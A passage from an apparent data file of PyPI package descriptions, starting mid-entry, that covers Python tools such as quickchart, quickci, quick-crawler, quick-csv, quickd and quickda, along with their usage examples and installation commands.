find and replace it.Use the providedQuickChartFunctionclass. Seeexamples/using_quickchartfunction.pyfor a full example.A short example usingQuickChartFunction:qc=QuickChart()qc.config={\"type\":\"bar\",\"data\":{\"labels\":[\"A\",\"B\"],\"datasets\":[{\"label\":\"Foo\",\"data\":[1,2]}]},\"options\":{\"scales\":{\"yAxes\":[{\"ticks\":{\"callback\":QuickChartFunction('(val) => val + \"k\"')}}],\"xAxes\":[{\"ticks\":{\"callback\":QuickChartFunction('''function(val) {return val + '???';}''')}}]}}}print(qc.get_url())Customizing your chartYou can set the following properties:config: dict or strThe actual Chart.js chart configuration.width: intWidth of the chart image in pixels. Defaults to 500height: intHeight of the chart image in pixels. Defaults to 300format: strFormat of the chart. Defaults to png. svg is also valid.background_color: strThe background color of the chart. Any valid HTML color works. Defaults to #ffffff (white). Also takes rgb, rgba, and hsl values.device_pixel_ratio: floatThe device pixel ratio of the chart. This will multiply the number of pixels by the value. This is usually used for retina displays. Defaults to 1.0.version: strThe version of Chart.js to use. Acceptable values are documentedhere. Usually used to select Chart.js 3+.hostOverride the host of the chart render server. Defaults to quickchart.io.keySet an API key that will be included with the request.Getting URLsThere are two ways to get a URL for your chart object.get_url(): strReturns a URL that will display the chart image when loaded.get_short_url(): strUses the quickchart.io web service to create a fixed-length chart URL that displays the chart image. Returns a URL such ashttps://quickchart.io/chart/render/f-a1d3e804-dfea-442c-88b0-9801b9808401.Note that short URLs expire after a few days for users of the free service. 
You cansubscribeto keep them around longer.Other functionalityget_bytes()Returns the bytes representing the chart image.to_file(path: str)Writes the chart image to a file path.More examplesCheckout theexamplesdirectory to see other usage."} +{"package": "quickci", "pacakge-description": "quickCIHave a quick look at the status of CI projects from the command line.Free software: MIT licenseDocumentation:https://quickci.readthedocs.ioGitHub repo:https://github.com/robertopreste/quickciFeaturesquickCI allows to have a quick overview of the status of build jobs on several CI services, for a specific branch of the repository being built.\nCurrently, quickCI supports checking build status for the following CI services:Travis CICircleCIAppVeyorBuddyDroneMore services to come!UsageConfigurationCreate a config file (it will be located in~/.config/quickci/tokens.json):$ quickci config createReplace placeholders with your own authentication tokens:$ quickci config update Available services are:Travis CI:travisCircleCI:circleAppVeyor:appveyorBuddy:buddyDrone:droneCheck that everything is correct:$ quickci config showCheck build statusCheck the build status of your projects:$ quickci statusThe build status of your Travis CI, CircleCI, AppVeyor, Buddy and Drone projects will be returned (masterbranch).\nIf you want to monitor one specific branch of your repositories (suppose you have many repos with a dedicateddevbranch for development), you can easily add the--branchoption:$ quickci status --branch devIf the--branchoption is not provided, the build status of themasterbranch will be retrieved by default.If you want to check one specific repository, you can provide the--repooption:$ quickci status --repo my_repoIt is obviously possible to combine the--repoand--branchoptions to check a given branch of a specific repository.It is also possible to check a specific service using subcommands ofquickci status:$ quickci status travis\n$ quickci status circle\n$ quickci status appveyor\n$ quickci status buddy\n$ quickci status droneThese subcommands also accept the--branchand--repooptions.\nIf the token for a specific service is not listed in~/.config/quickci/tokens.json, it is possible to provide it using the--tokenoption:$ quickci status travis --token Please refer to theUsagesection of the documentation for further information.InstallationquickCI can be installed using pip (Python>=3.6 only):$ pip install quickciPlease refer to theInstallationsection of the documentation for further information.CreditsThis package was created withCookiecutterand thecc-pypackageproject template.History0.1.0 (2019-04-20)First release.0.1.1 (2019-04-29)Update Config methods and attributes for better handling of tokens;Update CLI commands.0.1.2 (2019-06-03)Minor code fix;Update requirements and documentation;Fix AppVeyor request class and add GitLab draft.0.1.3 (2019-06-06)Add Buddy class.0.1.4 (2019-06-07)Change fetching functions to asyncio.0.2.0 (2019-07-02)Changeconfigandstatuscommands to group commands and add related subcommands;Change classes to use concurrent functions when possible;Clean code.0.2.1 (2019-07-03)Fix imports and tox test config.0.2.2 (2019-07-03)Fix setup.py installation process;Update documentation.0.2.3 (2019-07-13)Add Drone CI class and CLI commands;Update tests;Update documentation.0.3.0 (2019-07-28)Add--branchoption to check for specific branch;Update documentation.0.4.0 (2019-12-12)Add--repooption to check for a specific repository;Update documentation."} +{"package": "quick-cli", 
"pacakge-description": "Quick CLIThe Quick CLI lets you manage your Quick instance.\nFor more information on how to work with it, see ouruser guide.Set upThe CLI is a Python project and you can install via pip:pipinstallquick-cliThe first step after installing the CLI is creating a new context.\nOuruser guideprovides further information.ReferenceThere is alist of all commandsas a reference.\nAdditionally, you can run all commands with-hor--helpto display a help message.ContributingTheCLI's developer guideprovides more information on how to setup the project and the project's layout.\nFor general information, check out out thecontributing guide."} +{"package": "quick-clojure", "pacakge-description": "quick-------------------Run clojure scripts and lein commands quickly using a persistent nREPL session.Links`````* `development version `_"} +{"package": "quickclone", "pacakge-description": "QuickCloneCommand line utility for quickly cloning remote SCM repositories as succintly as possible.This project is a prime example of spending 24 hours to save 2 seconds.NotesCurrently, only git is supported. I might add mercurial and then subversion\nlater.InstallationFrom source:gitclonehttps://github.com/RenoirTan/QuickClone.gitcdQuickClone\npipinstall.FromPYPI:pipinstallquickcloneBoth ways should installqklnandquickcloneto PATH, meaning you don't have\nto call quickclone usingpython -m quickclone.qklnandquickcloneare\nboth entry points to the samemainfunction, so you can call either command.ConfigurationYou can configure QuickClone by editing~/.config/quickclone.toml.ExamplesqklnRenoirTan/QuickCloneIfoptions.local.remotes_diris defined, QuickClone will clone the repo into\na folder in that directory. For example, ifoptions.local.remotes_diris\ndefined as~/Code/remote, the repo will be cloned to~/Code/remote/github.com/RenoirTan/QuickClone.You can also overrideoptions.local.remotes_dirby specifying the destination\npath or adding the-Idflag to the command.qklnRenoirTan/QuickClone~/Desktop/destinationqklnRenoirTan/QuickClone-IdIn the latter example, QuickClone will ignoreoptions.local.remotes_dirand\nclone to./QuickClone.After cloning the remote repository, QuickClone will save where the repository\nwas cloned to locally in a cache file. You can then use this command to see\nwhere the last repository was cloned to:qkln-Land then cd into that directory:cd$(qkln-L)"} +{"package": "quickcloud", "pacakge-description": "No description available on PyPI."} +{"package": "quickcnn", "pacakge-description": "Main idea of QuickCNN is to train deep ConvNet without diving into architectural details. QuickCNN works as an interactive tool for transfer learning, finetuning, and scratch training with custom datasets. It has pretrained model zoo and also works with your custom keras model architecture."} +{"package": "quickconf", "pacakge-description": "quickconfSimple and flexible TOML-file based configurations frameworkIfTOML Kitis installed,quickconfwill use that and supports both reading and writing configuration files. 
Iftomlkitis not available,quickconfwill use the Python system librarytomllibbut will support only reading of configuration files.Installquickconfwith optional dependencysaveto ensuretomlkitis also installed:pip install quickconf[save]"} +{"package": "quickconfig", "pacakge-description": "UNKNOWN"} +{"package": "quick-config", "pacakge-description": "QuickConfigDescriptionQuickConfig is a super lightweight dynamic config provider for python applications.\nThe config provider uses a runtime config that can be imported to any part of your\napplication.quick_configparses and loads your environment configs only once\nbased on the runtime environment, and the built configs can be imported anywhere\nin your application!FeaturesBuilds modular configs which overwrite a base config based on the config required\nfor the application run time environment. Ex: thebaseconfig will be overwritten\nby thedevelopmentconfig if the app is running in thelocalordevelopmentruntime environment.Has a built-in API for queryable environment flags likeconfig.is_dev()orconfig.is_prod()for environment specific code pathsCreates a simple logger with a console and file handler at application run time\nwhich can be used anywhere in the application after importing thequick_configconfig.Creates callable methods on the globally loadedconfigobject which mirror the\nnames of the configs allowing engineers to call the methods in the app for their values\ninstead of doing config lookupsAllows for indexable accessors to configs which are collections. I.e., lists, tuples\nor maps/dictionariesInstallation$>pipinstallquick_configDesignThe quick config provider relies on a standard structure for an application's\nconfigurations. All configurations must be provided in aconfigdirectory.\nConfigs in theconfigdirectory must follow the standard deployment configuration\nnames likestaging.pyortest.pyorproduction.py. Once the runtime environment\nis set via an environment variable calledenvironment, the config provider will read\nthat and populate the configs available to the entire application as callable methods\nwhich can also be indexed if the provided congig is a collection (list,\ntuple, or map).UsageCreate an application like a Django/Flask Application which has runtime configs which may\ndiffer for each run time environment using the following nomenclature:create a directory calledconfigcreate files in the directory with the following structure# config/base.py:importosENV_VARS={\"some_api_key\":os.environ.get('my_api_key'),\"db_name\":\"my_default_db\",\"db_driver\":\"inmemory_sqlite\",\"important_array\":['a','b','c','d']}# config/production.py:importosENV_VARS={\"db_name\":os.environ.get(\"production_db\"),# overwrites base.py\"db_driver\":\"mysql\",\"important_array\":[1,2,3,4]# overwrites base.py}# config/development.py:ENV_VARS={\"db_name\":\"my_dev_db\",}Note the use ofENV_VARSin each environment file. 
That is requiredInstall thequick_configpackagepip install quick_configUse the environment vars in your application directly:# in my_app/my_module/file.pyfromquick_configimportconfigclassMyModule:def__init__(self):self.logger=config.get_logger()self.api_key=config.some_api_key()# depending on environment, this will changeself.important_index_value=config.important_array(0)db_connection_info={\"db_name\":config.db_name(),\"driver\":config.driver(),}"} +{"package": "quick-connect", "pacakge-description": "No description available on PyPI."} +{"package": "quickcpp", "pacakge-description": "quickcppquickcppis a small command-line tool to quickly build and run a single C++ file. Handy for quick experimentations.UsageThe simplest usage isquickcpp . When called like this,quickcppbuilds the file (producing aa.outfile) and runs the result.$ cat examples/helloworld.cpp \n#include \n\nint main(int argc, char** argv) {\n std::cout << \"Hello world!\\n\";\n return 0;\n}\n\n$ quickcpp examples/helloworld.cpp \n- Building ---------------------\nc++ examples/helloworld.cpp -Wall -fPIC -std=c++17 -g\n- Running ----------------------\nHello world!Using other librariesWant to experiment something withQtWidgets? You can specify any installed pkg-config compliant packages using-p :$ cat examples/qt.cpp \n#include \n#include \n\nint main(int argc, char** argv) {\n QApplication app(argc, argv);\n\n QMainWindow window;\n window.setWindowTitle(\"Hello World\");\n window.show();\n\n return app.exec();\n}\n\n$ quickcpp -p Qt5Widgets examples/qt.cpp \n- Building ---------------------\nc++ examples/qt.cpp -Wall -fPIC -std=c++17 -g -DQT_WIDGETS_LIB -DQT_GUI_LIB -DQT_CORE_LIB -I/usr/include/x86_64-linux-gnu/qt5/QtWidgets -I/usr/include/x86_64-linux-gnu/qt5 -I/usr/include/x86_64-linux-gnu/qt5/QtGui -I/usr/include/x86_64-linux-gnu/qt5 -I/usr/include/x86_64-linux-gnu/qt5/QtCore -I/usr/include/x86_64-linux-gnu/qt5 -lQt5Widgets -lQt5Gui -lQt5Core\n- Running ----------------------You should see a window like this one:Any package listed bypkg-config --list-allcan be used byquickcpp.Live reloadquickcppcan useentrto automatically rebuild and rerun your file. 
Just installentrand runquickcppwith the-lflag.InstallationThe recommended solution is to usepipx:pipx install quickcppBut you can also install it withpip:pip install --user quickcppLicenseApache 2.0"} +{"package": "quick-crawler", "pacakge-description": "Quick CrawlerA toolkit for quickly performing crawler functionsInstallationpip install quick-crawlerFunctionsget a html page and can save the file if the file path is assigned.get a json object from html stringget or download a series of url with similar format, like a page listremove unicode strget json object onlineread a series of obj from a json list onlinequick save csv file from a list of json objectsquick read csv file to a list of fieldsquick download a filequick crawler of a series of multi-lang websitesLet Codes SpeakExample 1:fromquick_crawler.pageimport*if__name__==\"__main__\":# get a html page and can save the file if the file path is assigned.url=\"https://learnersdictionary.com/3000-words/alpha/a\"html_str=quick_html_page(url)print(html_str)# get a json object from html stringhtml_obj=quick_html_object(html_str)word_list=html_obj.find(\"ul\",{\"class\":\"a_words\"}).findAll(\"li\")print(\"word list: \")forwordinword_list:print(word.find(\"a\").text.replace(\" \",\"\").strip())# get or download a series of url with similar format, like a page listurl_range=\"https://learnersdictionary.com/3000-words/alpha/a/{pi}\"list_html_str=quick_html_page_range(url_range,min_page=1,max_page=10)foridx,htmlinenumerate(list_html_str):html_obj=quick_html_object(html)word_list=html_obj.find(\"ul\",{\"class\":\"a_words\"}).findAll(\"li\")list_w=[]forwordinword_list:list_w.append(word.find(\"a\").text.replace(\" \",\"\").strip())print(f\"Page{idx+1}: \",','.join(list_w))Example 2:fromquick_crawler.pageimport*if__name__==\"__main__\":# remove unicode stru_str='a\u00e0\\xb9'u_str_removed=quick_remove_unicode(u_str)print(\"Removed str: \",u_str_removed)# get json object onlinejson_url=\"http://soundcloud.com/oembed?url=http%3A//soundcloud.com/forss/flickermood&format=json\"json_obj=quick_json_obj(json_url)print(json_obj)forkinjson_obj:print(k,json_obj[k])# read a series of obj from a json list onlinejson_list_url=\"https://jsonplaceholder.typicode.com/posts\"json_list=quick_json_obj(json_list_url)print(json_list)forobjinjson_list:userId=obj[\"userId\"]title=obj[\"title\"]body=obj[\"body\"]print(obj)# quick save csv file from a list of json objectsquick_save_csv(\"news_list.csv\",['userId','id','title','body'],json_list)# quick read csv file to a list of fieldslist_result=quick_read_csv(\"news_list.csv\",fields=['userId','title'])print(list_result)# quick download a filequick_download_file(\"https://www.englishclub.com/images/english-club-C90.png\",save_file_path=\"logo.png\")Example 3: obtain html text from the Browserfromquick_crawlerimportbrowserimportosif__name__==\"__main__\":html_str=browser.get_html_str_with_browser(\"https://pypi.org/project/quick-crawler/0.0.2/\",driver_path='../../examples/browsers/chromedriver.exe')print(html_str)Example 4: Crawl a series of web pages from a group of websitesfromquick_crawlerimportbrowserimportoslist_item=[['CNN','https://edition.cnn.com/'],['AP','https://apnews.com/']]current_path=os.path.dirname(os.path.realpath(__file__))browser.fetch_meta_info_from_sites(list_item,current_path+\"/data\",is_save_fulltext=True,use_plain_text=True)Example 5: Crawl a series of websites with advanced 
settingsfromquick_crawlerimportpage,browserimportosimportpicklelist_item=pickle.load(open(\"list_news_site.pickle\",\"rb\"))[20:]current_path=os.path.dirname(os.path.realpath(__file__))browser.fetch_meta_info_from_sites(list_item,current_path+\"/news_data1\",is_save_fulltext=True,use_plain_text=False,max_num_urls=100,use_keywords=True)list_model=browser.summarize_downloaded_data(\"news_data1\",# save_path=\"news_data_list.csv\")Example 6: Multi-lang crawlerimportosfromquick_crawler.multilangimportget_sites_with_multi_lang_keywordskeywords=\"digital economy\"init_urls=[[\"en-cnn\",\"https://edition.cnn.com/\"],['jp-asahi','https://www.asahi.com/'],['ru-mk','https://www.mk.ru/'],['zh-xinhuanet','http://xinhuanet.com/'],]current_path=os.path.dirname(os.path.realpath(__file__))list_item=get_sites_with_multi_lang_keywords(init_urls=init_urls,src_term=keywords,src_language=\"en\",target_langs=[\"ja\",\"zh\",\"es\",\"ru\"],save_data_folder=f\"{current_path}/news_data3\")Example 7: get multiple translations based on a keywordimportpicklefromquick_crawler.languageimport*terms='digital economy'dict_lang=get_lang_dict_by_translation(\"en\",terms)pickle.dump(dict_lang,open(f\"multi-lang-{terms}.pickle\",'wb'))Example 8: Pipeline for web page list processingfromquick_crawler.pipline.page_listimportrun_web_list_analysis_shellif__name__==\"__main__\":deffind_list(html_obj):returnhtml_obj.find(\"div\",{\"class\":\"bd\"}).findAll(\"li\")defget_item(item):datetime=item.find(\"span\").texttitle=item.find(\"a\").texturl=item.find(\"a\")[\"href\"]returntitle,url,datetimerun_web_list_analysis_shell(url_pattern=\"https://www.abc.com/index_{p}.html\",working_folder='test',min_page=1,max_page=2,fn_find_list=find_list,fn_get_item=get_item,tag='xxxx')LicenseThequick-crawlerproject is provided byDonghua Chen."} +{"package": "quickcss", "pacakge-description": "quickCSSQuick Cern Software Setup (QuickCSS)Getting startedTo make it easy for you to get started with GitLab, here's a list of recommended next steps.Already a pro? Just edit this README.md and make it your own. Want to make it easy?Use the template at the bottom!Add your filesCreateoruploadfilesAdd files using the command lineor push an existing Git repository with the following command:cd existing_repo\ngit remote add origin https://gitlab.cern.ch/clcheng/quickcss.git\ngit branch -M master\ngit push -uf origin masterIntegrate with your toolsSet up project integrationsCollaborate with your teamInvite team members and collaboratorsCreate a new merge requestAutomatically close issues from merge requestsEnable merge request approvalsAutomatically merge when pipeline succeedsTest and DeployUse the built-in continuous integration in GitLab.Get started with GitLab CI/CDAnalyze your code for known vulnerabilities with Static Application Security Testing(SAST)Deploy to Kubernetes, Amazon EC2, or Amazon ECS using Auto DeployUse pull-based deployments for improved Kubernetes managementSet up protected environmentsEditing this READMEWhen you're ready to make this README your own, just edit this file and use the handy template below (or feel free to structure it however you want - this is just a starting point!). Thank you tomakeareadme.comfor this template.Suggestions for a good READMEEvery project is different, so consider which of these sections apply to yours. The sections used in the template are suggestions for most open source projects. Also keep in mind that while a README can be too long and detailed, too long is better than too short. 
If you think your README is too long, consider utilizing another form of documentation rather than cutting out information.NameChoose a self-explaining name for your project.DescriptionLet people know what your project can do specifically. Provide context and add a link to any reference visitors might be unfamiliar with. A list of Features or a Background subsection can also be added here. If there are alternatives to your project, this is a good place to list differentiating factors.BadgesOn some READMEs, you may see small images that convey metadata, such as whether or not all the tests are passing for the project. You can use Shields to add some to your README. Many services also have instructions for adding a badge.VisualsDepending on what you are making, it can be a good idea to include screenshots or even a video (you'll frequently see GIFs rather than actual videos). Tools like ttygif can help, but check out Asciinema for a more sophisticated method.InstallationWithin a particular ecosystem, there may be a common way of installing things, such as using Yarn, NuGet, or Homebrew. However, consider the possibility that whoever is reading your README is a novice and would like more guidance. Listing specific steps helps remove ambiguity and gets people to using your project as quickly as possible. If it only runs in a specific context like a particular programming language version or operating system or has dependencies that have to be installed manually, also add a Requirements subsection.UsageUse examples liberally, and show the expected output if you can. It's helpful to have inline the smallest example of usage that you can demonstrate, while providing links to more sophisticated examples if they are too long to reasonably include in the README.SupportTell people where they can go to for help. It can be any combination of an issue tracker, a chat room, an email address, etc.RoadmapIf you have ideas for releases in the future, it is a good idea to list them in the README.ContributingState if you are open to contributions and what your requirements are for accepting them.For people who want to make changes to your project, it's helpful to have some documentation on how to get started. Perhaps there is a script that they should run or some environment variables that they need to set. Make these steps explicit. These instructions could also be useful to your future self.You can also document commands to lint the code or run tests. These steps help to ensure high code quality and reduce the likelihood that the changes inadvertently break something. Having instructions for running tests is especially helpful if it requires external setup, such as starting a Selenium server for testing in a browser.Authors and acknowledgmentShow your appreciation to those who have contributed to the project.LicenseFor open source projects, say how it is licensed.Project statusIf you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. 
You can also make an explicit request for maintainers."} +{"package": "quick-csv", "pacakge-description": "Quick CSVRead and write small or large CSV/TXT files in a simple mannerInstallationpip install quick-csvExamples for small filesExample 1: read and write csv or txt filesfromquickcsv.fileimport*# read a csv filelist_model=read_csv('data/test.csv')foridx,modelinenumerate(list_model):print(model)list_model[idx]['id']=idx# save a csv filewrite_csv('data/test1.csv',list_model)# write a text filewrite_text('data/text1.txt',\"Hello World!\")# read a text fileprint(read_text('data/text1.txt'))Example 2: create dataframe from a list of modelsfromquickcsv.fileimport*# read a csv filelist_model=read_csv('data/test.csv')# create a dataframe from list_modeldf=create_df(list_model)# printprint(df)Examples for large filesExample 1: read large csv filefromquickcsv.largefileimport*if__name__==\"__main__\":csv_path=r\"umls_atui_rels.csv\"# a large file (>500 MB)total_count=0defprocess_partition(part_df,i):print(f\"Part{i}\")defprocess_row(row,i):globaltotal_countprint(i)total_count+=1list_results=read_large_csv(csv_file=csv_path,row_func=process_row,partition_func=process_partition)print(\"Return: \")print(list_results)print(\"Total Record Num: \",total_count)Example 2: query from a large csv filefromquickcsv.largefileimport*if__name__==\"__main__\":csv_path=r\"umls_sui_nodes.csv\"# a large file (>500 MB)total_count=0# process each partition in the large filedefprocess_partition(part_df,i):print(f\"Part{i}\")print()# process each row in a partition while readingdefprocess_row(row,i):globaltotal_countprint(row)total_count+=1# field is a field in the csv file, and value is the value you need to find within the csv filelist_results=read_large_csv(csv_file=csv_path,field=\"SUI\",value=\"S0000004\",append_row=True,row_func=process_row,partition_func=process_partition)print(\"Return: \")print(list_results)print(\"Total Record Num: \",total_count)Example 3: read top N records from the large csv filefromquickcsv.largefileimport*if__name__==\"__main__\":csv_path=r\"umls_atui_rels.csv\"total_count=0# return top 10 rows in the csv filelist_results=read_large_csv(csv_file=csv_path,head_num=10)print(\"Return: \")print(list_results)print(\"Total Record Num: \",total_count)LicenseThequick-csvproject is provided byDonghua Chen."} +{"package": "quickd", "pacakge-description": "quickdDecorator type-based dependency injection for Python\ud83d\udce6 InstallationThe packagequickdsupports Python >= 3.5. 
You can install it by doing:$pipinstallquickd\ud83d\udcdc ExampleHere is a quick example:fromquickdimportinject,factoryclassDatabase:passclassPostgreSQL(Database):def__str__(self):return'PostgreSQL'classMySQL(Database):def__str__(self):return'MySQL'@injectdefprint_database(database:Database):returnprint(database)@factorydefchoose_database()->Database:returnPostgreSQL()print_database()# Prints: PostgreSQLprint_database(MySQL())# Prints: MySQL\ud83d\ude80 UsageThere are only 3 decorators that compose the whole framework@factoryRegisters an instance for a specific type for later use with@injectIs mandatory to annotate the function with the return type of the class that you want to inject laterIt isnotdynamic, so the implementation can only be chosen oncefromquickdimportfactory@factorydefchoose_database()->Database:returnPostgreSQL()@injectInjects dependencies to a function by matching its arguments types with what has been registeredAs you can see below, it also works with constructorsfromquickdimportinject@injectdefprint_database(database:Database):returnprint(database)classUserService:@injectdef__init__(self,database:Database):pass@serviceRegisters a class to be later injectable without using@factoryIt also applies@injectto its constructorfromquickdimportservice,inject@serviceclassUserService:def__init__(self):self.users=['Bob','Tom']defall(self):returnself.usersdefadd(self,user):self.users.append(user)@injectdefget_users(service:UserService):returnservice.all()@injectdefadd_user(service:UserService):returnservice.add(\"Pol\")get_users()# ['Bob', 'Tom']add_user()get_users()# ['Bob', 'Tom', 'Pol']\ud83d\udc68\u200d\ud83c\udf73 RecipesHere are some common solutions to scenarios you will face.Interfacesfromabcimportabstractmethodfromquickdimportinject,factoryclassUserRepository:@abstractmethoddefsave(self,user):pass@abstractmethoddefsearch(self,id):passclassUserCreator:@injectdef__int__(self,repository:UserRepository):self.repository=repositorydefcreate(self,user):self.repository.save(user)classMySQLUserRepository(UserRepository):def__int__(self,host,password):self.sql=MySQLConnection(host,password)defsave(self,user):self.sql.execute('INSERT ...')defsearch(self,id):self.sql.execute('SELECT ...')@factorydefchoose_user_repository()->UserRepository:# Notice super class is being usedreturnMySQLUserRepository('user','123')TestingFollowing the above example we can create a unit test mocking the persistance, which will make our tests easier and\nfaster.fake_user={'id':1,'name':'Tom'}classFakeUserRepository(UserRepository):defsave(self,user):assertuser==fake_userrepository=FakeUserRepository()user_creator=UserCreator(repository)user_creator.create(fake_user)ConfigurationThere are multiple ways to configure your classes. A simple approach is to use environment variables on your factory\nannotated methods.importosfromquickdimportfactory@factorydefchoose_database()->Database:username=os.environ.get(\"POSTGRES_USER\")password=os.environ.get(\"POSTGRES_PASS\")returnPostgreSQL(username,password)\ud83e\udde0 MotivationDependency injection provides a great way to decouple your classes in order to improve testability and maintainability.Frameworks likeSpringorSymfonyare loved by the community.I will just add a parameter to the constructor and Spring will fill with a global instance of the classThese frameworks rely heavy on the type system, to know which class should go where.From Python 3.5 we have thetypingpackage. 
This addition allows us to\nhave the dependency injection framework that Python deserves."} +{"package": "quickD3map", "pacakge-description": "#quickD3map### D3 Point Maps from Pandas DataFramesquickD3map allows you to rapidly generate D3.js maps from data from withinthe pandas/ipython ecosystem by converting Latitude/Longitude Data in to points **Note: this is an experimental repo and not ready for use.**With that said, basic maps can be generated and below are a few examples of how they are made.#### To make the following interactive map:![Examplemap](https://dl.dropboxusercontent.com/u/1803062/quickD3map/map1.png)#### Install and Use from the Examples Directory```pythonimport pandas as pdfrom quickD3map import PointMap#load data and plotstations = pd.read_csv('data/weatherstations.csv')#make a PointMap objectpm = PointMap(stations, columns = ['LAT','LON','ELEV'])#display or write your map to filepm.display_map()pm.create_map(path=\"map.html\")````###Project GoalsThe goal of this project is rather limited in scope:- be able to rapidly plot location data from Pandas dataframes- be able to color by another column- be able to scale by another column- be able to plot connections between plotsI intend to include several map templates (geojson files) and will try tofigure out a template style that can provide the ability to include maps of many types.Just thinking aloud here but the best way to do this would be to standardize thegeojson input types for features so that loading of data (as JSOn strings) can be seperatedfrom everything else (transformation,scaling, etc.)###Thanks.To Mike Bostocks and the D3JS team, as well as to Rob Story and the Folium libary.#History0.1.4 (2014-03-21)++++++++++++++++++* PointClass and LineMap updated. MultiColumnMap rolled into PointMap0.1.2 (2014-03-21)++++++++++++++++++* Updated README with some rudimentary Documentation0.1.1 (2014-03-19)++++++++++++++++++* Fix Manifest file to include template directory0.1.0 (2014-03-19)++++++++++++++++++* First release on PyPI."} +{"package": "quickda", "pacakge-description": "Quick-EDASimple & Easy-to-use python modules to perform Quick Exploratory Data Analysis for any structured dataset!Getting StartedYou will need to havePython 3andJupyter Notebookinstalled in your local system. Once installed, clone this repository to your local to get the project structure setup.git clone https://github.com/sid-the-coder/QuickDA.gitYou will also need to install few python package dependencies in your evironment to get started. 
You can do this by:pip3 install -r requirements.txtOR you can also install the package fromPyPi Indexusing the pip installer:pip3 install quickdaTable of ContentsData Exploration - explore(data)data: pd.DataFramemethod: string, default=\"summarize\"\"summarize\" : Generates a summary statistics of the dataset\"profile\" : Generates a HTML Report of the Dataset Profilereport_name: string, default=\"Dataset Report\"Parameter to customise the generated report nameis_large_dataset: Boolean, default=FalseParameter set to True explicitly to flag, in case of a large datasetData Cleaning - clean(data): [Returns DataFrame]data: pd.DataFramemethod: string, default=\"default\"\"default\" : Standardizes column names, Removes duplicates rows and Drops missing values\"standardize\" : Standardizes column names\"dropcols\" : Drops columns specified by the user\"duplicates\" : Removes duplicate rows\"replaceval\" : Replaces a value in dataframe with new value specified by the user\"fillmissing\" : Interpolates all columns with missing values using forward filling\"dropmissing\" : Drops all rows with missing values\"cardinality\" : Reduces Cardinality of a column given a threshold\"dtypes\" : Explicitly converts the Data Types as specified by the user\"outliers\" : Removes all outliers in data using IQR methodcolumns: list/string, default=[]Parameter to specify column names in the DataFramedtype: string, default=\"numeric\"\"numeric\" : Converts columns dtype to numeric\"category\" : Converts columns dtype to category\"datetime\" : Converts columns dtype to datetimeto_replace: string/integer/regex, default=\"\"Parameter to pass a value to replace in the DataFranevalue: string/integer/regex, default=np.nanParameter to pass a new value that replaces an old value in the Dataframethreshold: float, default=0Parameter to set threshold in the range of [0,1] for cardinalityEDA Numerical Features - eda_num(data)data: pd.DataFramemethod: string, default=\"default\"\"default\" : Shows all Outlier & Distribution Analysis via BoxPlots & Histograms\"correlation\" : Gets the correlation matrix between all numerical featuresbins: integer, default=10Parameter to set the number of bins while displaying histogramsEDA Categorical Features - eda_cat(data, x)data: pd.DataFramex: string, First Categorical Type Column Namey: string, default=NoneParameter to pass the Second Categorical Type Column Namemethod: string, default=\"default\"\"default\" : Shows category count plot & summarizes it in a frequency tableEDA Numerical with Categorical Features - eda_numcat(data, x, y)data: pd.DataFramex: string/list, Numeric/Categorical Type Column Name(s)y: string/list, Numeric/Categorical Type Column Name(s)method: string, default=\"pps\"\"pps\" : Calculates Predictive Power Score Matrix\"relationship\" : Shows Scatterplot of given features\"comparison\" : Shows violin plots to compare categories across numerical features\"pivot\" : Generates pivot table using column names, values and aggregation functionhue: string, default=NoneParameter to visualise a categorical Type feature within scatterplotsvalues: string/list, default=NoneParameter to set columns to aggregate on pivot viewsaggfunc: string, default=\"mean\"Parameter to set aggregate functions on pivot tablesExample: 'min', 'max', 'mean', 'median', 'sum', 'count'EDA Time Series Data - eda_timeseries(data, x, y)data: pd.DataFramex: string, Datetime Type Column Namey: string, Numeric Type Column NameUpcoming WorkBasic Preprocessing for Text Data- Tokenization, Normalization, Noise 
Removal, LemmatizationEDA for Text Data- NGrams, POS tagging, Word Cloud, Sentiment AnalysisQuick Insight Generation for all EDA steps- Generate easy-to-read textual insights"} +{"package": "quick-dag", "pacakge-description": "No description available on PyPI."} +{"package": "quickdataanalysis", "pacakge-description": "quick data analysisThis packages allows you to kick start your data analysis and make faster insights of the data.RequirementsPandas >=1.0.1Documentation1) Creating Dummies for columnsThe create_dummies method will return dummies for the columns. For example you want to dummies for Gender column put the column name in a list and you will get the dataframe with the dummies.>>> df = create_dummies(df_train,[\"sex\"])\n >>> df\n male female\n 0 1\n 1 0\n 1 0\n 1 02) Counting the column valuesThe count_values method will return the number of values in the columns. For example you want to count the number of females.>>> column_value_count(df_train[\"female\"],1,False)\n 312ToDoAdd more methodAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome :)Happy Coding!!"} +{"package": "quickDatabase", "pacakge-description": "python-dbLight weight database for python, with a simple API and a simple file format.\nit is not meant to be a full featured database, but rather a simple way to store data in a file.\nit's written in python, and is compatible with python 3.6 and above.FeaturesSimple APIColorful outputEasy to useCLI interfaceOpen sourceDocumentationThe documentation is available atnot yet availableInstallationYou can install python-db using pip:pip install python-dbUsageTo use python-db, you need to import it:from python_db import Database"} +{"package": "quick-data-clean", "pacakge-description": "Data fast processing framework, only for python 3.6 and above.Specific information for technical documentation is not available for now"} +{"package": "quick-datasets", "pacakge-description": "datasets"} +{"package": "quickdate", "pacakge-description": "quickdate\u5feb\u6377\u5904\u7406\u65e5\u671f\u7684Python\u5e93\uff0c\u652f\u6301\u4ece\u5b57\u7b26\u4e32\u89e3\u6790\u65e5\u671f\uff0c\u7075\u6d3b\u5b9e\u73b0\u52a0\u51cf\u65e5\u3001\u5468\u3001\u6708\u3001\u5e74\u3001\u65f6\u3001\u5206\u3001\u79d2\u7684\u65f6\u95f4\u64cd\u4f5c\u5982\u4f55\u5b89\u88c5\uff1fpipinstallquickdate\u5982\u4f55\u4f7f\u7528qucickdate\u9ed8\u8ba4\u4ee5\u4eca\u5929\u7684\u8d77\u70b9\uff0c\u5f00\u59cb\u5b9a\u4f4d\u65e5\u671f\uff0c\u5f53\u7136\u4f60\u4e5f\u53ef\u4ee5\u4f7f\u7528DateLocate.parse\u65b9\u6cd5\uff0c\u4ece\u5b57\u7b26\u4e32\u89e3\u6790\u4e00\u4e2a\u65e5\u671f\uff0c\u5e76\u4ee5\u6b64\u4e3a\u8d77\u70b9\u652f\u6301\u7684\u4e3b\u8981\u51fd\u6570\u662fadd\u51fd\u6570\uff0c\u53ef\u4ee5\u52a8\u6001\u4f20\u5165 